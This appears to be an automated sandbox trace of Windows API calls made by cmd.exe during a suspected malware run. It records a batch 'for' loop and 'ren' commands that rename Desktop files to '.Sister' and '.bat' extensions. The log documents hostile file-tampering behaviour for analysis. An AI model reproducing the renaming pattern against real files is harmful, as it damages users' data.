nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0145.161] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0145.161] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0145.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.161] GetFileType (hFile=0x50) returned 0x2 [0145.161] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0145.161] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0145.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.186] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0145.193] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.193] GetFileType (hFile=0x50) returned 0x2 [0145.193] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0145.193] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0145.197] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.197] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9371860*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9371860*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0145.199] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"hvO9HhgzXnxX2Pa-RAL.mp4\" \"hvO9HhgzXnxX2Pa-RAL.mp4.Sister\" ") returned 60 [0145.199] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.199] GetFileType (hFile=0x50) returned 0x2 [0145.200] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0145.200] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0145.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.220] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3c) returned 1 [0145.231] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0145.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.231] GetFileType (hFile=0x50) returned 0x2 [0145.231] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0145.231] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0145.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.238] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0145.246] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0145.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.246] GetFileType (hFile=0x50) returned 0x2 [0145.246] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0145.246] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0145.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.285] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0145.296] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0145.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.296] GetFileType (hFile=0x50) returned 0x2 [0145.296] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0145.297] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0145.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.303] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0145.312] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0145.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.312] GetFileType (hFile=0x50) returned 0x2 [0145.312] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0145.312] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0145.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.314] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0145.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.325] GetFileType (hFile=0x50) returned 0x2 [0145.325] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0145.325] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9371d40*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9371d40*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0145.391] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"hvO9HhgzXnxX2Pa-RAL.mp4.Sister\" \"hvO9HhgzXnxX2Pa-RAL.bat\" ") returned 60 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] GetFileType (hFile=0x50) returned 0x2 [0145.391] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0145.392] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3c) returned 1 [0145.404] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] GetFileType (hFile=0x50) returned 0x2 [0145.404] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0145.404] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0145.438] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0145.444] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0145.445] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0145.445] malloc (_Size=0xffce) returned 0x21ed917fe80 [0145.446] ??_V@YAXPEAX@Z () returned 0x21ed917fe80 [0145.447] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0145.447] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0145.447] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0145.447] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0145.447] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0145.447] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0145.447] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0145.447] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0145.447] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0145.447] ??_V@YAXPEAX@Z () returned 0x1 [0145.447] GetProcessHeap () returned 0x21ed8c70000 [0145.447] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x100) returned 0x21ed9390070 [0145.447] GetProcessHeap () returned 0x21ed8c70000 [0145.447] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9390070, Size=0x88) returned 0x21ed9390070 [0145.447] GetProcessHeap () returned 0x21ed8c70000 [0145.447] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9390070) returned 0x88 [0145.447] GetProcessHeap () returned 0x21ed8c70000 [0145.447] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed9390110 [0145.447] GetProcessHeap () returned 0x21ed8c70000 [0145.447] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x100) returned 0x21ed93901b0 [0145.447] GetProcessHeap () returned 0x21ed8c70000 [0145.447] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93901b0, Size=0x88) returned 0x21ed93901b0 [0145.447] GetProcessHeap () returned 0x21ed8c70000 [0145.447] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93901b0) returned 0x88 [0145.447] malloc (_Size=0xffce) returned 0x21ed917fe80 [0145.447] ??_V@YAXPEAX@Z () returned 0x21ed917fe80 [0145.447] GetProcessHeap () returned 0x21ed8c70000 [0145.448] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43630 [0145.448] GetProcessHeap () returned 0x21ed8c70000 [0145.448] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5a8f0 [0145.448] _wcsicmp (_String1="hvO9HhgzXnxX2Pa-RAL.mp4", _String2=".") returned 58 [0145.448] _wcsicmp (_String1="hvO9HhgzXnxX2Pa-RAL.mp4", _String2="..") returned 58 [0145.448] GetFileAttributesW (lpFileName="hvO9HhgzXnxX2Pa-RAL.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\hvo9hhgzxnxx2pa-ral.mp4")) returned 0x20 [0145.448] GetProcessHeap () returned 0x21ed8c70000 [0145.448] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9390250 [0145.449] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9390260 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0145.449] SetErrorMode (uMode=0x0) returned 0x0 [0145.449] SetErrorMode (uMode=0x1) returned 0x0 [0145.449] GetFullPathNameW (in: lpFileName="hvO9HhgzXnxX2Pa-RAL.mp4", nBufferLength=0x7fe7, lpBuffer=0x21ed917fe80, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\hvO9HhgzXnxX2Pa-RAL.mp4", lpFilePart=0xa6cf4fd660*="hvO9HhgzXnxX2Pa-RAL.mp4") returned 0x2f [0145.450] SetErrorMode (uMode=0x0) returned 0x1 [0145.450] GetProcessHeap () returned 0x21ed8c70000 [0145.450] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5ba00 [0145.450] _wcsicmp (_String1="hvO9HhgzXnxX2Pa-RAL.mp4", _String2=".") returned 58 [0145.450] _wcsicmp (_String1="hvO9HhgzXnxX2Pa-RAL.mp4", _String2="..") returned 58 [0145.450] GetFileAttributesW (lpFileName="hvO9HhgzXnxX2Pa-RAL.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\hvo9hhgzxnxx2pa-ral.mp4")) returned 0x20 [0145.450] ??_V@YAXPEAX@Z () returned 0x1 [0145.450] malloc (_Size=0xffce) returned 0x21ed917fe80 [0145.450] ??_V@YAXPEAX@Z () returned 0x21ed917fe80 [0145.450] malloc (_Size=0xffce) returned 0x21ed918fe60 [0145.450] ??_V@YAXPEAX@Z () returned 0x21ed918fe60 [0145.453] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\hvO9HhgzXnxX2Pa-RAL.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\hvo9hhgzxnxx2pa-ral.mp4")) returned 0x20 [0145.453] malloc (_Size=0xffce) returned 0x21ed919fe40 [0145.453] ??_V@YAXPEAX@Z () returned 0x21ed919fe40 [0145.453] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\hvO9HhgzXnxX2Pa-RAL.mp4", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5a900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5a900) returned 0x21ed8d43690 [0145.453] malloc (_Size=0xffce) returned 0x21ed91afe20 [0145.454] ??_V@YAXPEAX@Z () returned 0x21ed91afe20 [0145.454] ??_V@YAXPEAX@Z () returned 0x1 [0145.454] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\hvO9HhgzXnxX2Pa-RAL.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\hvo9hhgzxnxx2pa-ral.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\hvO9HhgzXnxX2Pa-RAL.mp4.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\hvo9hhgzxnxx2pa-ral.mp4.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0146.954] FindNextFileW (in: hFindFile=0x21ed8d43690, lpFindFileData=0x21ed8d5a900 | out: lpFindFileData=0x21ed8d5a900*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7971430, ftCreationTime.dwHighDateTime=0x1d5e80d, ftLastAccessTime.dwLowDateTime=0x30ca2e90, ftLastAccessTime.dwHighDateTime=0x1d5e872, ftLastWriteTime.dwLowDateTime=0x30ca2e90, ftLastWriteTime.dwHighDateTime=0x1d5e872, nFileSizeHigh=0x0, nFileSizeLow=0x16a2d, dwReserved0=0x0, dwReserved1=0x0, cFileName="hvO9HhgzXnxX2Pa-RAL.mp4", cAlternateFileName="")) returned 0 [0146.957] GetLastError () returned 0x12 [0146.957] FindClose (in: hFindFile=0x21ed8d43690 | out: hFindFile=0x21ed8d43690) returned 1 [0146.982] ??_V@YAXPEAX@Z () returned 0x1 [0146.982] ??_V@YAXPEAX@Z () returned 0x1 [0146.983] ??_V@YAXPEAX@Z () returned 0x1 [0146.984] ??_V@YAXPEAX@Z () returned 0x1 [0146.985] GetProcessHeap () returned 0x21ed8c70000 [0146.985] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d435d0 [0146.985] GetProcessHeap () returned 0x21ed8c70000 [0146.985] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95980, Size=0x16) returned 0x21ed8c95ac0 [0146.985] GetProcessHeap () returned 0x21ed8c70000 [0146.985] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95ac0) returned 0x16 [0146.985] GetProcessHeap () returned 0x21ed8c70000 [0146.985] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0146.985] GetProcessHeap () returned 0x21ed8c70000 [0146.985] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0146.985] GetProcessHeap () returned 0x21ed8c70000 [0146.985] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d65ec0 [0146.985] GetProcessHeap () returned 0x21ed8c70000 [0146.985] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d65ec0, Size=0xb2) returned 0x21ed8d65ec0 [0146.986] GetProcessHeap () returned 0x21ed8c70000 [0146.986] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d65ec0) returned 0xb2 [0146.986] GetProcessHeap () returned 0x21ed8c70000 [0146.986] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9371f70 [0146.986] GetProcessHeap () returned 0x21ed8c70000 [0146.986] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9371f70, Size=0x30) returned 0x21ed9371f70 [0146.986] GetProcessHeap () returned 0x21ed8c70000 [0146.986] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9371f70) returned 0x30 [0146.986] GetProcessHeap () returned 0x21ed8c70000 [0146.986] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9371fb0 [0146.986] malloc (_Size=0x1ff9c) returned 0x21ed917fe80 [0146.988] GetProcessHeap () returned 0x21ed8c70000 [0146.988] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d47c90 [0146.988] GetProcessHeap () returned 0x21ed8c70000 [0146.988] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8d47f90 [0146.988] ??_V@YAXPEAX@Z () returned 0x1 [0146.990] malloc (_Size=0x1ff9c) returned 0x21ed917fe80 [0146.992] GetProcessHeap () returned 0x21ed8c70000 [0146.992] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d46790 [0146.992] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed917fe80, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0146.992] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9390170, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d43390 [0146.992] FindClose (in: hFindFile=0x21ed8d43390 | out: hFindFile=0x21ed8d43390) returned 1 [0146.992] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9390170, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d42c70 [0146.993] FindClose (in: hFindFile=0x21ed8d42c70 | out: hFindFile=0x21ed8d42c70) returned 1 [0146.993] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x822c673b, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x822c673b, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9390170, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d43390 [0146.993] FindClose (in: hFindFile=0x21ed8d43390 | out: hFindFile=0x21ed8d43390) returned 1 [0146.993] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x822c673b, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x822c673b, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9390170, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0146.994] malloc (_Size=0x1ff9c) returned 0x21ed919fe30 [0146.994] ??_V@YAXPEAX@Z () returned 0x21ed919fe30 [0146.995] GetProcessHeap () returned 0x21ed8c70000 [0146.995] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d65f90 [0146.995] ??_V@YAXPEAX@Z () returned 0x1 [0146.995] ??_V@YAXPEAX@Z () returned 0x1 [0146.996] GetProcessHeap () returned 0x21ed8c70000 [0146.996] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9371fb0, Size=0x490) returned 0x21ed9371fb0 [0146.996] GetProcessHeap () returned 0x21ed8c70000 [0146.996] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9371fb0) returned 0x490 [0146.996] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0146.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.996] GetFileType (hFile=0x50) returned 0x2 [0146.996] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0146.996] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0147.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.142] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0147.257] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0147.257] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0147.257] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0147.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.257] GetFileType (hFile=0x50) returned 0x2 [0147.257] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0147.257] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0147.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.355] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0147.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.372] GetFileType (hFile=0x50) returned 0x2 [0147.372] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0147.372] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0147.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.381] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9371f80*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9371f80*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0147.384] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0147.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.384] GetFileType (hFile=0x50) returned 0x2 [0147.384] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0147.384] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0147.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.402] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0147.587] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0147.587] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.587] GetFileType (hFile=0x50) returned 0x2 [0147.587] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0147.587] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0147.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.603] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0147.626] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0147.637] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0147.638] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 